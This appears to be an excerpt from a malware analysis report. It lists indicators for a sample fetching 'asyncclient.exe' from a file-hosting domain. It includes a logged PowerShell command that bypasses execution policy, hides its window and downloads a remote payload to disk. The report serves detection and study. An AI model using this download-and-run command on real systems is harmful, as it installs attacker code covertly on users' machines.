Technical Information
- https://www.up##ad.ee/download/13235722/26978a65a5df194e1868/asyncclient.exe
- 'up##ad.ee':443
- 'up##ad.ee':443
- DNS ASK up##ad.ee
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'https://www.up##ad.ee/download/13235722/26978a65a5df194e18...' (with hidden window)